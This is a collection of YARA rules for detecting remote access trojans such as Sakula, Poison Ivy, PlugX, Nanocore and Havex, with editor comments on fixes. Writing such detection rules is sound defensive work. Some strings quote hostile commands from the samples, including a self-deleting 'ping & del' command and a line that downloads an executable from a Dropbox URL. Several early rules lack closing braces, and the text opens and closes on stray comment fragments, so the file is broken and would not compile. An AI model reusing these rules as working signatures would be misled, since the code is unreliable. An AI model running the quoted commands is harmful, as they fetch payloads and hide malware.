// rule can never also match sakula_v1_1.
rule sakula_v1_0: RAT   
   {   
       meta:   
           description = "Sakula v1.0"   
           date = "2015-10-13"   
           author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"   
       strings:   
           $m1 = "%d_of_%d_for_%s_on_%s"   
           $m2 = "/c ping 127.0.0.1 & del /q \"%s\""   
           $m3 = "=%s&type=%d"   
           $m4 = "?photoid="   
           $m5 = "iexplorer"   
                   $m6 = "net start \"%s\""   
           $v1_1 = "MicroPlayerUpdate.exe"   
           $MZ = "MZ"   
       condition:   
           $MZ at 0 and all of ($m*) and not $v1_1   
// Sakula v1.3: PE magic at offset 0, the three shared format strings ($m*) and a
// version-specific code sequence ($v1_3); all required.
rule sakula_v1_3: RAT   
   {   
       meta:   
           description = "Sakula v1.3"   
           date = "2015-10-13"   
           author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"   
       strings:   
           $m1 = "%d_of_%d_for_%s_on_%s"   
           $m2 = "/c ping 127.0.0.1 & del /q \"%s\""   
           $m3 = "cmd.exe /c rundll32 \"%s\""   
      
           $v1_3 = { 81 3E 78 03 00 00 75 57  8D 54 24 14 52 68 0C 05 41 00 68 01 00 00 80 FF  15 00 F0 40 00 85 C0 74 10 8B 44 24 14 68 2C 31  41 00 50 FF 15 10 F0 40 00 8B 4C 24 14 51 FF 15  24 F0 40 00 E8 0F 09 00 }   
      
           $MZ = "MZ"   
       condition:   
           $MZ at 0 and all of them   
// Sakula v1.1: the six $m* strings shared with the v1.0 rule plus the
// "MicroPlayerUpdate.exe" marker ($v1_1); all required, PE magic at offset 0.
rule sakula_v1_1: RAT   
   {   
       meta:   
           description = "Sakula v1.1"   
           date = "2015-10-13"   
           author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"   
       strings:   
           $m1 = "%d_of_%d_for_%s_on_%s"   
           $m2 = "/c ping 127.0.0.1 & del /q \"%s\""   
           $m3 = "=%s&type=%d"   
           $m4 = "?photoid="   
           $m5 = "iexplorer"   
                   $m6 = "net start \"%s\""   
           $v1_1 = "MicroPlayerUpdate.exe"   
           $MZ = "MZ"   
       condition:   
           $MZ at 0 and all of them   
// Sakula v1.2: PE magic at 0, the three shared format strings, the "CCPUpdate"
// marker, and explicitly NOT the v1.1 marker so the two version rules stay disjoint.
rule sakula_v1_2: RAT   
   {   
       meta:   
           description = "Sakula v1.2"   
           date = "2015-10-13"   
           author = "Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou"   
       strings:   
           $m1 = "%d_of_%d_for_%s_on_%s"   
           $m2 = "/c ping 127.0.0.1 & del /q \"%s\""   
           $m3 = "cmd.exe /c rundll32 \"%s\""   
           $v1_1 = "MicroPlayerUpdate.exe"   
           $v1_2 = "CCPUpdate"   
      
           $MZ = "MZ"   
       condition:   
           $MZ at 0 and $m1 and $m2 and $m3 and $v1_2 and not $v1_1   
// https://otx.alienvault.com/pulse/58cbc1358a636209a5948ac7
// Poison Ivy (memory): one hex pattern that decodes to "StubPath", one wildcard
// byte, "SOFTWARE\Classes\http\shell\open\command", a 22-byte jump, then
// "Software\Microsoft\Active Setup\Installed Components\" — the persistence
// registry paths laid out as the implant stores them.
rule poisonivy_1 : rat   
   {   
   	meta:   
   		description = "Poison Ivy"   
   		author = "Jean-Philippe Teissier / @Jipe_"   
   		date = "2013-02-01"   
   		filetype = "memory"   
   		version = "1.0"    
   		ref1 = "https://code.google.com/p/volatility/source/browse/trunk/contrib/plugins/malware/poisonivy.py"   
      
   	strings:   
   		$a = { 53 74 75 62 50 61 74 68 ?? 53 4F 46 54 57 41 52 45 5C 43 6C 61 73 73 65 73 5C 68 74 74 70 5C 73 68 65 6C 6C 5C 6F 70 65 6E 5C 63 6F 6D 6D 61 6E 64 [22] 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 41 63 74 69 76 65 20 53 65 74 75 70 5C 49 6E 73 74 61 6C 6C 65 64 20 43 6F 6D 70 6F 6E 65 6E 74 73 5C }    
   		   
   	condition:   
   		$a   
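// Poison Ivy: the "StubPath" stub marker ($stub; bytes 53 74 75 62 50 61 74 68 are
// that ASCII) plus five client strings.
// The original condition was
//     $stub at 0x1620 and all of ($string*) or (all of them)
// which parses as (($stub at 0x1620) and all of ($string*)) or (all of them). The
// right-hand disjunct already requires $stub at any offset together with every
// $string*, so the left-hand clause can never contribute a match; the condition is
// therefore written as the equivalent "all of them". If the fixed offset 0x1620 was
// meant to be the only accepted position, use instead:
//     $stub at 0x1620 and all of ($string*)
rule PoisonIvy_2   
   {   
   	meta:   
   		author = " Kevin Breen <kevin@techanarchy.net>"   
   		date = "2014/04"   
   		ref = "http://malwareconfig.com/stats/PoisonIvy"   
   		maltype = "Remote Access Trojan"   
   		filetype = "exe"   
      
       strings:   
       	$stub = {04 08 00 53 74 75 62 50 61 74 68 18 04}   
           $string1 = "CONNECT %s:%i HTTP/1.0"   
           $string2 = "ws2_32"   
           $string3 = "cks=u"   
           $string4 = "thj@h"   
           $string5 = "advpack"   
       condition:   
   		all of them   
   }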
// Poison Ivy generic: PE magic (uint16(0) == 0x5a4d), under 500 KB, and either the
// "Tiger324{" key marker alone, all of the $s* import/file names, or all of the $h*
// HTTP/ASP strings. $s8 and $h3 are the same literal ("login.asp") under two
// identifiers, so the two groups overlap on that string.
rule PoisonIvy_Generic_3 {   
   	meta:   
   		description = "PoisonIvy RAT Generic Rule"   
   		author = "Florian Roth"   
   		date = "2015-05-14"   
   		hash = "e1cbdf740785f97c93a0a7a01ef2614be792afcd"   
   	strings:   
   		$k1 = "Tiger324{" fullword ascii   
   		   
   		$s2 = "WININET.dll" fullword ascii   
   		$s3 = "mscoree.dll" fullword wide   
   		$s4 = "WS2_32.dll" fullword   
   		$s5 = "Explorer.exe" fullword wide   
   		$s6 = "USER32.DLL"   
   		$s7 = "CONOUT$"   
   		$s8 = "login.asp"   
   		   
   		$h1 = "HTTP/1.0"   
   		$h2 = "POST"   
   		$h3 = "login.asp"   
   		$h4 = "check.asp"   
   		$h5 = "result.asp"   
   		$h6 = "upload.asp"   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 500KB and   
   			(    
   				$k1 or all of ($s*) or all of ($h*)   
   			)   
// https://otx.alienvault.com/pulse/59394a42f3b08d6814e96168
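// APT.Kaba RTF documents: an RTF header signature at offset 0, a fixed document
// author ("John Doe" or "author Stone") and a hex pattern with two wildcard gaps.
// The original condition read
//     ($magic1 or $magic2 or $magic3 at 0)
// where "at 0" binds only to $magic3, so $magic1/$magic2 were accepted anywhere in
// the file. All three are RTF header magics (see the comments beside them) and the
// rule's filetype is RTF, so the offset-0 test is applied to each of them.
rule rtf_Kaba_jDoe   
   {   
      
   meta:   
       author = "@patrickrolsen"   
       maltype = "APT.Kaba"   
       filetype = "RTF"   
       version = "0.1"   
       description = "fe439af268cd3de3a99c21ea40cf493f, d0e0e68a88dce443b24453cc951cf55f, b563af92f144dea7327c9597d9de574e, and def0c9a4c732c3a1e8910db3f9451620"   
       date = "2013-12-10"   
      
   strings:   
       $magic1 = { 7b 5c 72 74 30 31 } // {\rt01   
       $magic2 = { 7b 5c 72 74 66 31 } // {\rtf1   
       $magic3 = { 7b 5c 72 74 78 61 33 } // {\rtxa3   
       $author1 = { 4A 6F 68 6E 20 44 6F 65 } // "John Doe"   
       $author2 = { 61 75 74 68 6f 72 20 53 74 6f 6e 65 } // "author Stone"   
       $string1 = { 44 30 [16] 43 46 [23] 31 31 45 }   
      
   condition:   
       ($magic1 at 0 or $magic2 at 0 or $magic3 at 0) and all of ($author*) and $string1   
   }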
// PlugX identifying strings: the "boot.ldr" loader name alone is sufficient;
// otherwise the "d:\work" build path must be combined with a version/module marker
// (plug2.5, Plug3.0 or Shell6).
rule PlugXStrings : PlugX Family   
   {   
       meta:   
           description = "PlugX Identifying Strings"   
           author = "Seth Hardy"   
           last_modified = "2014-06-12"   
              
       strings:   
           $BootLDR = "boot.ldr" wide ascii   
           $Dwork = "d:\\work" nocase   
           $Plug25 = "plug2.5"   
           $Plug30 = "Plug3.0"   
           $Shell6 = "Shell6"   
            
       condition:   
           $BootLDR or ($Dwork and ($Plug25 or $Plug30 or $Shell6))   
// PlugX (memory): $v1a is "GULP" followed by four NUL bytes at offset 0 (the
// decompressed-payload header), $v1b the update URL format; otherwise a v2 marker
// ($v2a/$v2b) combined with either both v1 key-schedule byte patterns or the $v2k
// constant.
rule plugX : rat   
   {   
   	meta:   
   		author = "Jean-Philippe Teissier / @Jipe_"   
   		description = "PlugX RAT"   
   		date = "2014-05-13"   
   		filetype = "memory"   
   		version = "1.0"    
   		ref1 = "https://github.com/mattulm/IR-things/blob/master/volplugs/plugx.py"   
   		   
   	strings:   
   		$v1a = { 47 55 4C 50 00 00 00 00 }   // "GULP\0\0\0\0"
   		$v1b = "/update?id=%8.8x"    
   		$v1algoa = { BB 33 33 33 33 2B }    
   		$v1algob = { BB 44 44 44 44 2B }    
   		$v2a = "Proxy-Auth:"    
   		$v2b = { 68 A0 02 00 00 }    
   		$v2k = { C1 8F 3A 71 }    
   		   
   	condition:    
   		$v1a at 0 or $v1b or (($v2a or $v2b) and (($v1algoa and $v1algob) or $v2k))   
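// PlugX, event-log variant: meant to run over exported Windows Security logs, not
// PE files. It looks for three process-creation records (event ID 4688 from
// Microsoft-Windows-Security-Auditing): the launcher under a numeric directory in
// AppData\Roaming, rundll32.exe, and iexplore.exe — the chain the description
// describes. All strings are required.
// Fix: the original $data regex had a single backslash before VMwareCplLauncher
// (`[0-9]{9,12}\VMwareCplLauncher`). Every other path separator in the pattern is
// the escaped `\\`, so that lone backslash could not stand for the
// `\Roaming\<digits>\VMwareCplLauncher.exe` separator the rule intends; it is now
// `\\` like the others.
// Note: $type/$type1/$type2 and $eventid/$eventid1/$eventid2 are identical literals
// under different identifiers; under "all of them" the copies add nothing beyond the
// first, and they are kept only so existing match output keeps its string names.
rule PlugX_mw   
   {    
   	meta:   
   		maltype = "plugX"   
   		author = "https://github.com/reed1713"   
   		reference = "http://www.fireeye.com/blog/technical/targeted-attack/2014/02/operation-greedywonk-multiple-economic-and-foreign-policy-sites-compromised-serving-up-flash-zero-day-exploit.html"   
   		description = "Malware creates a randomized directory within the appdata roaming directory and launches the malware. Should see multiple events for create process rundll32.exe and iexplorer.exe as it repeatedly uses iexplorer to launch the rundll32 process."   
   	strings:   
   		$type="Microsoft-Windows-Security-Auditing"   
   		$eventid="4688"   
   		$data=/\\AppData\\Roaming\\[0-9]{9,12}\\VMwareCplLauncher\.exe/   
      
   		$type1="Microsoft-Windows-Security-Auditing"   
   		$eventid1="4688"   
   		$data1="\\Windows\\System32\\rundll32.exe"   
      
   		$type2="Microsoft-Windows-Security-Auditing"   
   		$eventid2="4688"   
   		$data2="Program Files\\Internet Explorer\\iexplore.exe"   
   	condition:   
   		all of them   
   }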
// https://otx.alienvault.com/pulse/57a11c4c31564d04cae119fb
// Orcus RAT (memory): .NET namespace/type names, plugin archive names, HVNC and
// keylogger command names. 13 of the 33 strings are required, so a hit needs a
// substantial part of the Orcus class layout rather than a single "Orcus." mention.
rule RAT_Orcus    
   {   
      
       meta:   
           author = " J from THL <j@techhelplist.com> with thx to MalwareHunterTeam"   
           date = "2017/01"   
           reference = "https://virustotal.com/en/file/0ef747363828342c184303f2d6fbead054200e9c223e5cfc4777cda03006e317/analysis/"   
           version = 1   
           maltype = "RAT"   
           filetype = "memory"   
      
       strings:   
           $text01 = "Orcus.CommandManagement"   
           $text02 = "Orcus.Commands."   
           $text03 = "Orcus.Config."   
           $text04 = "Orcus.Connection."   
           $text05 = "Orcus.Core."   
           $text06 = "Orcus.exe"   
           $text07 = "Orcus.Extensions."   
           $text08 = "Orcus.InstallationPromptForm"   
           $text09 = "Orcus.MainForm."   
           $text10 = "Orcus.Native."   
           $text11 = "Orcus.Plugins."   
           $text12 = "orcus.plugins.dll"   
           $text13 = "Orcus.Properties."   
           $text14 = "Orcus.Protection."   
           $text15 = "Orcus.Share."   
           $text16 = "Orcus.Shared"   
           $text17 = "Orcus.StaticCommands"   
           $text18 = "Orcus.Utilities."   
           $text19 = "\\Projects\\Orcus\\Source\\Orcus."   
           $text20 = ".orcus.plugins.dll.zip"   
           $text21 = ".orcus.shared.dll.zip"   
           $text22 = ".orcus.shared.utilities.dll.zip"   
           $text23 = ".orcus.staticcommands.dll.zip"   
           $text24 = "HvncCommunication"   
           $text25 = "HvncAction"   
           $text26 = "hvncDesktop"   
           $text27 = ".InstallationPromptForm"   
           $text28 = "RequestKeyLogCommand"   
           $text29 = "get_KeyLogFile"   
           $text30 = "LiveKeyloggerCommand"   
           $text31 = "ORCUS.STATICCOMMANDS, VERSION="   
           $text32 = "PrepareOrcusFileToRemove"   
           $text33 = "ConvertFromOrcusValueKind"   
      
       condition:   
           13 of them   
// https://otx.alienvault.com/pulse/595d080daa0104746aa1bc16
// NetWiredRC (memory): the fixed mutex name alone is enough; otherwise one of the
// log/ID format strings ($str*) plus one of the keylogger key-name tokens ($klg*).
// The $klg* tokens ("[Backspace]", "[Enter]", ...) are common keylogger output and
// would be weak on their own, which is why a $str* hit is required alongside them.
rule NetWiredRC_B : RAT   
   {   
   	meta:   
   		description = "NetWiredRC"   
   		author = "Jean-Philippe Teissier / @Jipe_"   
   		date = "2014-12-23"   
   		filetype = "memory"   
   		version = "1.1"    
      
   	strings:   
   		$mutex = "LmddnIkX"   
      
   		$str1 = "%s.Identifier"   
   		$str2 = "%d:%I64u:%s%s;"   
   		$str3 = "%s%.2d-%.2d-%.4d"   
   		$str4 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]"   
   		$str5 = "%.2d/%.2d/%d %.2d:%.2d:%.2d"   
   		   
   		$klg1 = "[Backspace]"   
   		$klg2 = "[Enter]"   
   		$klg3 = "[Tab]"   
   		$klg4 = "[Arrow Left]"   
   		$klg5 = "[Arrow Up]"   
   		$klg6 = "[Arrow Right]"   
   		$klg7 = "[Arrow Down]"   
   		$klg8 = "[Home]"   
   		$klg9 = "[Page Up]"   
   		$klg10 = "[Page Down]"   
   		$klg11 = "[End]"   
   		$klg12 = "[Break]"   
   		$klg13 = "[Delete]"   
   		$klg14 = "[Insert]"   
   		$klg15 = "[Print Screen]"   
   		$klg16 = "[Scroll Lock]"   
   		$klg17 = "[Caps Lock]"   
   		$klg18 = "[Alt]"   
   		$klg19 = "[Esc]"   
   		$klg20 = "[Ctrl+%c]"   
      
   	condition:    
   		$mutex or (1 of ($str*) and 1 of ($klg*))   
// https://otx.alienvault.com/pulse/571931ffc1492d015b14bb6a
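// Nanocore RAT (generic, set 1). One indicator suffices for a small PE file; three
// are required otherwise. Fixes: missing closing "}", typo in description.
rule Nanocore_RAT_Gen_1 {
    meta:
        description = "Detects the Nanocore RAT and similar malware"
        author = "Florian Roth"
        reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
        date = "2016-04-22"
        score = 70
        hash1 = "e707a7745e346c5df59b5aa4df084574ae7c204f4fb7f924c0586ae03b79bf06"
    strings:
        // Build-path artefact left in the PDB reference
        $x1 = "C:\\Users\\Logintech\\Dropbox\\Projects\\New folder\\Latest\\Benchmark\\Benchmark\\obj\\Release\\Benchmark.pdb" fullword ascii
        $x2 = "RunPE1" fullword ascii
        $x3 = "082B8C7D3F9105DC66A7E3267C9750CF43E9D325" fullword ascii
        $x4 = "$374e0775-e893-4e72-806c-a8d880a49ae7" fullword ascii
        $x5 = "Monitorinjection" fullword ascii
    condition:
        // 0x5a4d = "MZ" little-endian: PE files under 100KB need only one hit
        ( uint16(0) == 0x5a4d and filesize < 100KB and ( 1 of them ) ) or ( 3 of them )
}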
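// Nanocore RAT (generic, set 2): plugin-host type names and an obfuscated identifier.
// Fixes: missing closing "}", typo in description.
rule Nanocore_RAT_Gen_2 {
    meta:
        description = "Detects the Nanocore RAT"
        author = "Florian Roth"
        score = 100
        reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
        date = "2016-04-22"
        hash1 = "755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050"
    strings:
        $x1 = "NanoCore.ClientPluginHost" fullword ascii
        $x2 = "IClientNetworkHost" fullword ascii
        $x3 = "#=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe" fullword ascii
    condition:
        // One hit is enough for a PE ("MZ") under 1000KB; otherwise all three are required
        ( uint16(0) == 0x5a4d and filesize < 1000KB and 1 of them ) or ( all of them )
}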
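// Nanocore RAT, sample-specific rule (obfuscated names and a resource name).
// Fixes: missing closing "}", typo in description.
rule Nanocore_RAT_Sample_1 {
    meta:
        description = "Detects a certain Nanocore RAT sample"
        author = "Florian Roth"
        score = 75
        reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
        date = "2016-04-22"
        // NOTE(review): numbered hash2 with no hash1 — kept as authored
        hash2 = "b7cfc7e9551b15319c068aae966f8a9ff563b522ed9b1b42d19c122778e018c8"
    strings:
        $x1 = "TbSiaEdJTf9m1uTnpjS.n9n9M7dZ7FH9JsBARgK" fullword wide
        $x2 = "1EF0D55861681D4D208EC3070B720C21D885CB35" fullword ascii
        $x3 = "popthatkitty.Resources.resources" fullword ascii
    condition:
        // All strings are $x*, so "all of them" below equals "all of ($x*)"
        ( uint16(0) == 0x5a4d and filesize < 900KB and ( 1 of ($x*) ) ) or ( all of them )
}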
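// Nanocore RAT, sample-specific rule: a small PE carrying all three markers.
// Fixes: missing closing "}", typo in description.
rule Nanocore_RAT_Sample_2 {
    meta:
        description = "Detects a certain Nanocore RAT sample"
        author = "Florian Roth"
        score = 75
        reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
        date = "2016-04-22"
        hash1 = "51142d1fb6c080b3b754a92e8f5826295f5da316ec72b480967cbd68432cede1"
    strings:
        $s1 = "U4tSOtmpM" fullword ascii
        $s2 = ")U71UDAU_QU_YU_aU_iU_qU_yU_" fullword wide
        $s3 = "Cy4tOtTmpMtTHVFOrR" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 40KB and all of ($s*)
}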
// https://otx.alienvault.com/pulse/57c84d7a6eba7e0135d187fc
// Meterpreter stage in memory: transport/UA marker strings and the metsrv.dll
// reflective-loader reference. Same condition as before, regrouped for readability.
rule Meterpreter_Reverse_Tcp {
    meta:
        // Standard Metasploit backdoor/RAT; attribution to any single actor is not possible
        author = "chort (@chort0)"
        description = "Meterpreter reverse TCP backdoor in memory. Tested on Win7x64."
    strings:
        // "METERPRETER_TRANSPORT_SSL" ... "https://XXXXXX"
        $a = { 4d 45 54 45 52 50 52 45 54 45 52 5f 54 52 41 4e 53 50 4f 52 54 5f 53 53 4c [32-48] 68 74 74 70 73 3a 2f 2f 58 58 58 58 58 58 }
        // "METERPRETER_UA"
        $b = { 4d 45 54 45 52 50 52 45 54 45 52 5f 55 41 }
        // "GET /123456789 HTTP/1.0"
        $c = { 47 45 54 20 2f 31 32 33 34 35 36 37 38 39 20 48 54 54 50 2f 31 2e 30 }
        // "metsrv.dll" ... "ReflectiveLoader"
        $d = { 6d 65 74 73 72 76 2e 64 6c 6c [2-4] 52 65 66 6c 65 63 74 69 76 65 4c 6f 61 64 65 72 }

    condition:
        // The SSL transport marker alone is decisive; otherwise the HTTP request
        // line must appear together with the UA or loader marker.
        $a or ($c and any of ($b, $d))
}
// https://otx.alienvault.com/pulse/5671dc9667db8c3f8b467f1d
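// hiZor RAT DLL: stacked-string User-Agent construction, its XOR decode loops and
// a few plain API/format strings; all indicators must be present.
// Fixes: missing closing "}"; the ELF check compared uint32(0) with 0x4464c457f,
// a 36-bit constant that a 32-bit read can never equal, so that branch was dead.
// 0x464c457f is "\x7fELF" read as a little-endian uint32.
rule apt_win32_dll_rat_hiZor_RAT: RAT
{
    meta:
        description = "Detects hiZor RAT"
        hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"
        hash2 = "d9821468315ccd3b9ea03161566ef18e"
        hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"
        ref1 = "http://www.threatgeek.com/2016/01/introducing-hi-zor-rat.html"
        ref2 = "https://github.com/Neo23x0/Loki/blob/b187ed063d73d0defc6958100ca7ad04aa77fc12/signatures/apt_hizor_rat.yar"
        reference = "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL.pdf"
    strings:
        // Part of the encoded User-Agent = Mozilla
        $s1 = { c7 [5] 40 00 62 00 c7 [5] 77 00 64 00 c7 [5] 61 00 61 00 c7 [5] 6c 00 }

        // XOR to decode User-Agent after string stacking 0x10001630
        $s2 = { 66 [7] 0d 40 83 ?? ?? 7c ?? }

        // XOR with 0x2E - 0x10002EF6
        $s3 = { 80 [2] 2e 40 3b ?? 72 ?? }

        $s4 = "CmdProcessExited" wide ascii
        $s5 = "rootDir" wide ascii
        $s6 = "DllRegisterServer" wide ascii
        $s7 = "GetNativeSystemInfo" wide ascii
        $s8 = "%08x%08x%08x%08x" wide ascii
    condition:
        // PE ("MZ") or ELF ("\x7fELF") header, and every indicator above
        (uint16(0) == 0x5A4D or uint32(0) == 0x464c457f) and (all of them)
}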
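// Fidelis FTA-1020 indicators: stacked-string builds of the User-Agent and the Run
// key path, the word/byte XOR decode loops, and two plain strings; all must match.
// Fixes: missing closing "}"; the ELF check used 0x4464c457f, a 36-bit constant that
// uint32(0) can never equal, so that branch was dead. 0x464c457f is "\x7fELF" as a
// little-endian uint32.
rule apt_win32_dll_rat_1a53b0cp32e46g0qio7
{
    meta:
        author = "https://www.fidelissecurity.com/"
        info = "Indicators for FTA-1020"
        hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"
        hash2 = "d9821468315ccd3b9ea03161566ef18e"
        hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"
        reference = "https://github.com/fideliscyber"
    strings:
        // Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0;rv:11.0) like Gecko
        $ = { c7 [2] 64 00 63 00 c7 [2] 69 00 62 00 c7 [2] 7a 00 7e 00 c7 [2] 2d 00 43 00 c7 [2] 59 00 2d 00 c7 [2] 3b 00 23 00 c7 [2] 3e 00 36 00 c7 [2] 2d 00 5a 00 c7 [2] 42 00 5a 00 c7 [2] 3b 00 39 00 c7 [2] 36 00 2d 00 c7 [2] 59 00 7f 00 c7 [2] 64 00 69 00 c7 [2] 68 00 63 00 c7 [2] 79 00 22 00 c7 [2] 3a 00 23 00 c7 [2] 3d 00 36 00 c7 [2] 2d 00 7f 00 c7 [2] 7b 00 37 00 c7 [2] 3c 00 3c 00 c7 [2] 23 00 3d 00 c7 [2] 24 00 2d 00 c7 [2] 61 00 64 00 c7 [2] 66 00 68 00 c7 [2] 2d 00 4a 00 c7 [2] 68 00 6e 00 c7 [2] 66 00 62 00 } // offset 10001566
        // Software\Microsoft\Windows\CurrentVersion\Run
        $ = { c7 [2] 23 00 24 00 c7 [2] 24 00 33 00 c7 [2] 38 00 22 00 c7 [2] 00 00 33 00 c7 [2] 24 00 25 00 c7 [2] 3f 00 39 00 c7 [2] 38 00 0a 00 c7 [2] 04 00 23 00 c7 [2] 38 00 00 00 c7 [2] 43 00 66 00 c7 [2] 6d 00 60 00 c7 [2] 67 00 52 00 c7 [2] 6e 00 63 00 c7 [2] 7b 00 67 00 c7 [2] 70 00 00 00 c7 [2] 43 00 4d 00 c7 [2] 44 00 00 00 c7 [2] 0f 00 43 00 c7 [2] 00 00 50 00 c7 [2] 49 00 4e 00 c7 [2] 47 00 00 00 c7 [2] 11 00 12 00 c7 [2] 17 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 11 00 06 00 c7 [2] 44 00 45 00 c7 [2] 4c 00 00 00 } // 10003D09
        $ = { 66 [4-7] 0d 40 83 f8 44 7c ?? }
        // xor		word ptr [ebp+eax*2+var_5C], 14h
        // inc		eax
        // cmp     	eax, 14h
        // Loop to decode a static string. It reveals the "1a53b0cp32e46g0qio9" static string sent in the beacon
        $ = { 66 [4-7] 14 40 83 f8 14 7c ?? } // 100017F0
        $ = { 66 [4-7] 56 40 83 f8 2d 7c ?? } // 10003621
        $ = { 66 [4-7] 20 40 83 f8 1a 7c ?? } // 10003640
        $ = { 80 [2-7] 2e 40 3d 50 02 00 00 72 ?? } //  10003930
        $ = "%08x%08x%08x%08x" wide ascii
        $ = "WinHttpGetIEProxyConfigForCurrentUser" wide ascii

    condition:
        // PE ("MZ") or ELF ("\x7fELF") header, and every indicator above
        (uint16(0) == 0x5A4D or uint32(0) == 0x464c457f) and (all of them)
}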
// https://otx.alienvault.com/pulse/5977c131481b4c6685f5f810
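// Indetectables RAT: author handles, crypter tags and a domain found in the referenced
// research; one hit in a PE under 5000KB is enough. Fix: missing closing "}".
rule Indetectables_RAT: RAT {
    meta:
        description = "Detects Indetectables RAT based on strings found in research by Paul Rascagneres & Ronan Mouchoux"
        author = "Florian Roth"
        reference = "http://www.sekoia.fr/blog/when-a-brazilian-string-smells-bad/"
        date = "2015-10-01"
        super_rule = 1
        hash1 = "081905074c19d5e32fd41a24b4c512d8fd9d2c3a8b7382009e3ab920728c7105"
        hash2 = "66306c2a55a3c17b350afaba76db7e91bfc835c0e90a42aa4cf59e4179b80229"
        hash3 = "1fa810018f6dd169e46a62a4f77ae076f93a853bfc33c7cf96266772535f6801"
    strings:
        $s1 = "Coded By M3" fullword wide
        $s2 = "Stub Undetector M3" fullword wide
        $s3 = "www.webmenegatti.com.br" wide
        $s4 = "M3n3gatt1" fullword wide
        $s5 = "TheMisterFUD" fullword wide
        $s6 = "KillZoneKillZoneKill" fullword ascii
        $s7 = "[[__M3_F_U_D_M3__]]$" fullword ascii
        $s8 = "M3_F_U_D_M3" ascii
        // Same handle in both encodings
        $s9 = "M3n3gatt1hack3r" fullword wide
        $s9a = "M3n3gatt1hack3r" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 5000KB and 1 of them
}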
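// Downloader/dropper scripts attributed to the Indetectables RAT author: build path
// and hard-coded download command ($x*), or two of the AutoIt/VB source fragments.
// Fix: missing closing "}".
rule BergSilva_Malware : RAT {
    meta:
        description = "Detects a malware from the same author as the Indetectables RAT"
        author = "Florian Roth"
        date = "2015-10-01"
        super_rule = 1
        hash1 = "00e175cbad629ee118d01c49c11f3d8b8840350d2dd6d16bd81e47ae926f641e"
        hash2 = "6b4cbbee296e4a0e867302f783d25d276b888b1bf1dcab9170e205d276c22cfc"
    strings:
        $x1 = "C:\\Users\\Berg Silva\\Desktop\\" wide
        $x2 = "URLDownloadToFileA 0, \"https://dl.dropbox.com/u/105015858/nome.exe\", \"c:\\nome.exe\", 0, 0" fullword wide

        // Source-code fragments with Portuguese comments left in the samples
        $s1 = " Process.Start (Path.GetTempPath() & \"name\" & \".exe\") 'start server baixado" fullword wide
        $s2 = "FileDelete(@TempDir & \"\\nome.exe\") ;Deleta o Arquivo para que possa ser executado normalmente" fullword wide
        $s3 = " Lib \"\\WINDOWS\\system32\\UsEr32.dLl\"" fullword wide
        $s4 = "$Directory = @TempDir & \"\\nome.exe\" ;Define a variavel" fullword wide
        $s5 = "https://dl.dropbox.com/u/105015858" wide
    condition:
        uint16(0) == 0x5a4d and ( 1 of ($x*) or 2 of ($s*) )
}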
// https://otx.alienvault.com/pulse/58cf04d405e7853a71c2fac1
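// Havex executable carved from a memory dump: MZ header at offset 0 plus either
// three of the scanner log strings or the sample's own file name.
// Fix: missing closing "}".
rule SANS_ICS_Cybersecurity_Challenge_400_Havex_Memdump : memory
{
    meta:
        description = "Detects Havex Windows process executable from memory dump"
        date = "2015-12-2"
        author = "Chris Sistrunk"
        hash = "8065674de8d79d1c0e7b3baf81246e7d"
    strings:
        $magic = { 4d 5a }

        $s1 = "~tracedscn.yls" fullword wide
        $s2 = "[!]Start" fullword wide
        $s3 = "[+]Get WSADATA" fullword wide
        $s4 = "[-]Can not get local ip" fullword wide
        $s5 = "[+]Local:" fullword wide
        $s6 = "[-]Threads number > Hosts number" fullword wide
        $s7 = "[-]Connection error" fullword wide

        $x1 = "bddd4e2b84fa2ad61eb065e7797270ff.exe" fullword wide
    condition:
        $magic at 0 and ( 3 of ($s*) or $x1 )
}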
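// Havex C2 server-side PHP component: marker comment and two constant names.
// Fix: missing closing "}".
rule Havex_Trojan_PHP_Server
{
    meta:
        Author      = "Florian Roth"
        Date        = "2014/06/24"
        Description = "Detects the PHP server component of the Havex RAT"
        Reference   = "www.f-secure.com/weblog/archives/00002718.html"

    strings:
        $s1 = "havex--></body></head>"
        $s2 = "ANSWERTAG_START"
        $s3 = "PATH_BLOCKFILE"

    condition:
        all of them
}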
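// Havex OPC-scanner variant: MZ at offset 0, then the dropped DLL name or any of
// the (misspelled) scanner status messages. Fix: missing closing "}".
rule Win32OPCHavex
{
    meta:
        Author      = "BAE Systems"
        Date        = "2014/06/23"
        Description = "Rule for identifying OPC version of HAVEX"
        Reference   = "www.f-secure.com/weblog/archives/00002718.html"

    strings:
        $mzhdr = "MZ"
        $dll = "7CFC52CD3F87.dll"
        // Spelling mistakes below are verbatim from the sample; do not "fix" them
        $a1 = "Start finging of LAN hosts..." wide
        $a2 = "Finding was fault. Unexpective error" wide
        $a3 = "Was found %i hosts in LAN:" wide
        $a4 = "Hosts was't found." wide
        $a5 = "Start finging of OPC Servers..." wide
        $a6 = "Was found %i OPC Servers." wide
        $a7 = "OPC Servers not found. Programm finished" wide
        $a8 = "%s[%s]!!!EXEPTION %i!!!" wide
        $a9 = "Start finging of OPC Tags..." wide

    condition:
        $mzhdr at 0 and ($dll or (any of ($a*)))
}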
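// Havex "fertger" variant: MZ at offset 0 plus three of the pipe names, file
// patterns and family strings. Fix: missing closing "}".
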